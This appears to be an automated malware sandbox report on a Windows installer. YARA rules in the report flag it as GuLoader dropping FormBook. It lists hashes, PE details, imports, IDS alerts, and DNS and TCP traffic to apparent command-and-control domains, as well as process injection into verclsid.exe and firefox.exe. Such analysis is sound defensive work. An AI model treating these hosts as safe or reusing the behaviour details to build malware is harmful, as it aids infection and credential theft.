SHA-256:	72A2010CDB6ED407FCA17CDB181D5F01801F16040C2C9443BD7CB5032CDAAEF7
SHA-512:	865EF0F7636149A47043183583635C2A4306BF49565166760672B88F0F9DA89A529FE4166DFF496327304E56A8A460B8113E5F3D58601C0B8A3EFAABD792AF3D
Malicious:	false
Preview:	avenging piktogrammernes duecento korsedderkop skurvognsudlejningernes fnges ranaria..kavitet ubetalelige forhalingen passado nautically formaalsbestemmelsernes admiralsuniformers..franchot unimposing rimfire.bemba barsac unflaked skbnesvanger.tige backchats leveret viktualieforretningernes processal dignitas altica epoxyharpikset sergenter forureningsbegrnsedes..sforsvaret antiquating photomechanically enighedernes firepot megrez almon aeneus madrassen thrallborn denoteres slipup tvebakken..

C:\Users\user\AppData\Roaming\secretaryships\straffespark.Sek

Download File

Process:	C:\Users\user\Desktop\Anfrage_244384.exe
File Type:	data
Category:	dropped
Size (bytes):	284322
Entropy (8bit):	7.771418895856943
Encrypted:	false
SSDEEP:	6144:fOiGjlSjER8DMKEzL4eNm6Vkg9XNf805ft+MODD+T:GCjEa4/zLD+05ek
MD5:	301AF874579F9CE64FCE51A01F616625
SHA1:	6D35516DA84E4342C8E094023B60175BAB5EDCEB
SHA-256:	35BE42786F6EF050A3BAEA615517E40958E6140A089E7D4A83283F1708994C03
SHA-512:	3275C3B39115C29FE923C415D36F4932C279018994E636CE6606C5604B6FA5DA984C7244BE7017AC78204F6F8D90AE7706B1E729FAD91EAEB3C2020A610755E4
Malicious:	false
Preview:	.............00.....................................................WW...:...GGG..ll......................;;;....U.........<.....M..........JJ..........K....................l...###........................;;...\\.t.999.lllll..ee.LL...........^^^.......CC...@.......(............................4....................9.........tt.....................'..........1.................\....GGG.....^........3.ZZ.:.w.....----...C.......ccccc...d.&&.....I..>>>>...www.......k.......o...~~................9......................F.A...XX.........dd........A..00...++..............%%%%...............NNNN....QQ.[[[......ffffff........0.........@.r..\|.i............KK......y...,,,,,,....TTTTT...a........CCC.........................`.....((.............RR.........7...x.......#.y............1..................._........TTTT.gg.................k........HHHH...................$$..................b..........((.?.=====....................M.B.j.!........sss....U..__...............$..;;...........////...x....WW.BB..3

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.578007574835592
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Anfrage_244384.exe
File size:	1'240'824 bytes
MD5:	b03f23199ae987a7bce0ff1a0d742e3e
SHA1:	f454c8de72926ee9f98db7056fa89f0c3ada9666
SHA256:	eda014e3b658bfbbfd141c1459a3414d9ee8b7c139a3976fe732141fa9cf3f80
SHA512:	01ccdc0f586a8926a56f0d3bfee91c5e882bff5df84cbb5363df6681fb62863a8075af8261bb72ecf2360d9d4dc4552dddb4e1ec1da002c24b9416ff0d3f95be
SSDEEP:	24576:aCAoDyk/vnt3h1CzLuTIv08yZVk7ku8h7w6/t338euHdB4bU4VD4C:aCAfqvtx1UuTIMfg7ku8Vfx3/uHHSU4t
TLSH:	E445124337660AA5D45984F7D75ACD30BFA3BC7B018006EB325CB71A9ABA3F0452B539
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F...v...F...@...F.Rich..F.........................PE..L...<.MX.................b...\|.....

File Icon


Icon Hash:	076d76bb4c713307

Static PE Info

General

Entrypoint:	0x4031a3
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x584DCA3C [Sun Dec 11 21:50:52 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b78ecf47c0a3e24a6f4af114e2d1f5de

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=immechanical, O=immechanical, L=Montiers, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	26/07/2024 11:01:31 26/07/2027 11:01:31
Subject Chain	CN=immechanical, O=immechanical, L=Montiers, C=FR
Version:	3
Thumbprint MD5:	8DCDBA681539229FD7339C836C203A51
Thumbprint SHA-1:	9C6E1EF295C999DBD8E2212BF532CD5F5E425BC0
Thumbprint SHA-256:	E345B14576959ED8D4BF59A4660594FC647CCA9157F84BFFB114D15B60339C48
Serial:	313E1C1AB85C6CF76B122FEB885EF111CAA7CE29

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 0040A198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004080A8h]
call dword ptr [004080A4h]
cmp ax, 00000006h
je 00007F1534C242F3h
push ebx
call 00007F1534C27261h
cmp eax, ebx
je 00007F1534C242E9h
push 00000C00h
call eax
mov esi, 00408298h
push esi
call 00007F1534C271DDh
push esi
call dword ptr [004080A0h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F1534C242CDh
push ebp
push 00000009h
call 00007F1534C27234h
push 00000007h
call 00007F1534C2722Dh
mov dword ptr [0042F404h], eax
call dword ptr [00408044h]
push ebx
call dword ptr [00408288h]
mov dword ptr [0042F4B8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 00429828h
call dword ptr [00408174h]
push 0040A188h
push 0042EC00h
call 00007F1534C26E57h
call dword ptr [0040809Ch]
mov ebp, 00435000h
push eax
push ebp
call 00007F1534C26E45h
push ebx
call dword ptr [00408154h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8534	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4b000	0x64f00	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x12cc18	0x22e0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6071	0x6200	86ec2a2da0012903b23e33f511180572	False	0.6687659438775511	data	6.434342820031866	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1352	0x1400	cd090b7c5bd9ae3da2a43d4f02ef98b7	False	0.4599609375	data	5.237297010093776	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x254f8	0x600	e98382d1559cdefaafaf45200fe1faf0	False	0.4544270833333333	data	4.037252180314336	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x30000	0x1b000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4b000	0x64f00	0x65000	4b35ddad0638afdc14d8651f31f9f72e	False	0.5893022896039604	data	6.144636705094013	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_BITMAP	0x4b400	0x368	Device independent bitmap graphic, 96 x 16 x 4, image size 768	English	United States	0.23623853211009174
RT_ICON	0x4b768	0x4180c	Device independent bitmap graphic, 255 x 510 x 32, image size 260100	English	United States	0.5566530003727171
RT_ICON	0x8cf78	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	English	United States	0.6340796167041287
RT_ICON	0x9d7a0	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 36864	English	United States	0.6664652091654404
RT_ICON	0xa6c48	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	English	United States	0.6956188001889466
RT_ICON	0xaae70	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	English	United States	0.6902489626556016
RT_ICON	0xad418	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	English	United States	0.724437148217636
RT_ICON	0xae4c0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	English	United States	0.7479508196721312
RT_ICON	0xaee48	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	English	United States	0.799645390070922
RT_DIALOG	0xaf2b0	0x144	data	English	United States	0.5216049382716049
RT_DIALOG	0xaf3f8	0x13c	data	English	United States	0.5506329113924051
RT_DIALOG	0xaf538	0x100	data	English	United States	0.5234375
RT_DIALOG	0xaf638	0x11c	data	English	United States	0.6091549295774648
RT_DIALOG	0xaf758	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0xaf820	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0xaf880	0x76	data	English	United States	0.7457627118644068
RT_VERSION	0xaf8f8	0x2c8	data	English	United States	0.5084269662921348
RT_MANIFEST	0xafbc0	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
USER32.dll	ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll	RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-06T16:10:51.193850+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	52.149.20.212	443	192.168.2.6	49753	TCP
2024-11-06T16:11:29.888003+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	52.149.20.212	443	192.168.2.6	49926	TCP
2024-11-06T16:11:29.973578+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.6	49927	188.40.95.144	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 6, 2024 16:11:28.768946886 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:28.768976927 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:28.769068003 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:28.780911922 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:28.780921936 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:29.657499075 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:29.657598972 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:29.708969116 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:29.708998919 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:29.709355116 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:29.709409952 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:29.713604927 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:29.755340099 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:29.973598957 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:29.973630905 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:29.973704100 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:29.973727942 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:29.974431038 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.090436935 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.090507030 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.108393908 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.108469963 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.224955082 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.225029945 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.226656914 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.226733923 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.342242956 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.342363119 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.343491077 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.343590021 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.459671974 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.459764004 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.460283041 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.460346937 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.576864004 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.577044964 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.578058004 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.578149080 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.693831921 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.693994045 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.694691896 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.694760084 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.811450005 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.811522007 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.811695099 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.811753988 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.812539101 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.812597990 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.928647995 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.928831100 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:30.928858995 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.928873062 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:30.928920984 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.045684099 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.045768023 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.045856953 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.045918941 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.046528101 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.046591043 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.162657022 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.162900925 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.163398027 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.163460970 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.163692951 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.163753033 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.279798985 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.279913902 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.280013084 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.280071020 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.280838013 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.281049013 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.397082090 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.397152901 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.397691965 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.397759914 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.398647070 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.398708105 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.516211987 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.516320944 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.516426086 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.516480923 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.516498089 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.516556978 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.633235931 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.633323908 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.633493900 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.633542061 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.634280920 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.634358883 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.634495020 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.649395943 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.649420023 CET	443	49927	188.40.95.144	192.168.2.6
Nov 6, 2024 16:11:31.649429083 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:11:31.652431965 CET	49927	443	192.168.2.6	188.40.95.144
Nov 6, 2024 16:12:25.578471899 CET	49985	80	192.168.2.6	194.58.112.174
Nov 6, 2024 16:12:25.583801985 CET	80	49985	194.58.112.174	192.168.2.6
Nov 6, 2024 16:12:25.583904982 CET	49985	80	192.168.2.6	194.58.112.174
Nov 6, 2024 16:12:25.592947960 CET	49985	80	192.168.2.6	194.58.112.174
Nov 6, 2024 16:12:25.598653078 CET	80	49985	194.58.112.174	192.168.2.6
Nov 6, 2024 16:12:26.524735928 CET	80	49985	194.58.112.174	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 6, 2024 16:11:28.557219028 CET	53943	53	192.168.2.6	1.1.1.1
Nov 6, 2024 16:11:28.763389111 CET	53	53943	1.1.1.1	192.168.2.6
Nov 6, 2024 16:12:25.464119911 CET	61751	53	192.168.2.6	1.1.1.1
Nov 6, 2024 16:12:25.571099043 CET	53	61751	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 6, 2024 16:11:28.557219028 CET	192.168.2.6	1.1.1.1	0xb39	Standard query (0)	familytherapycenter.rs	A (IP address)	IN (0x0001)	false
Nov 6, 2024 16:12:25.464119911 CET	192.168.2.6	1.1.1.1	0x5ba6	Standard query (0)	www.svarus.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 6, 2024 16:11:28.763389111 CET	1.1.1.1	192.168.2.6	0xb39	No error (0)	familytherapycenter.rs		188.40.95.144	A (IP address)	IN (0x0001)	false
Nov 6, 2024 16:12:25.571099043 CET	1.1.1.1	192.168.2.6	0x5ba6	No error (0)	www.svarus.online		194.58.112.174	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

familytherapycenter.rs

www.svarus.online

Target ID:	0
Start time:	10:10:32
Start date:	06/11/2024
Path:	C:\Users\user\Desktop\Anfrage_244384.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Anfrage_244384.exe"
Imagebase:	0x400000
File size:	1'240'824 bytes
MD5 hash:	B03F23199AE987A7BCE0FF1A0D742E3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2597198603.0000000004A03000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Analysis Process: Anfrage_244384.exePID: 5608, Parent PID: 5308

General

Target ID:	4
Start time:	10:11:21
Start date:	06/11/2024
Path:	C:\Users\user\Desktop\Anfrage_244384.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Anfrage_244384.exe"
Imagebase:	0x400000
File size:	1'240'824 bytes
MD5 hash:	B03F23199AE987A7BCE0FF1A0D742E3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3122242151.0000000034330000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3123079037.0000000035D90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Analysis Process: dptLotHBnXg.exePID: 3052, Parent PID: 5608

General

Target ID:	6
Start time:	10:12:03
Start date:	06/11/2024
Path:	C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe"
Imagebase:	0x9c0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3362392086.0000000004560000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Analysis Process: verclsid.exePID: 1056, Parent PID: 3052

General

Target ID:	7
Start time:	10:12:04
Start date:	06/11/2024
Path:	C:\Windows\SysWOW64\verclsid.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\verclsid.exe"
Imagebase:	0xbe0000
File size:	11'776 bytes
MD5 hash:	190A347DF06F8486F193ADA0E90B49C5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3362363415.0000000000960000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3362535904.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Analysis Process: dptLotHBnXg.exePID: 3916, Parent PID: 1056

General

Target ID:	8
Start time:	10:12:19
Start date:	06/11/2024
Path:	C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe"
Imagebase:	0x9c0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3361838593.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Analysis Process: firefox.exePID: 1832, Parent PID: 1056

General

Target ID:	10
Start time:	10:12:31
Start date:	06/11/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff728280000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Disassembly

⊘No disassembly

Source: Joe Sandbox View	IP Address: 188.40.95.144 188.40.95.144
Source: Joe Sandbox View	IP Address: 194.58.112.174 194.58.112.174

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.6:49753
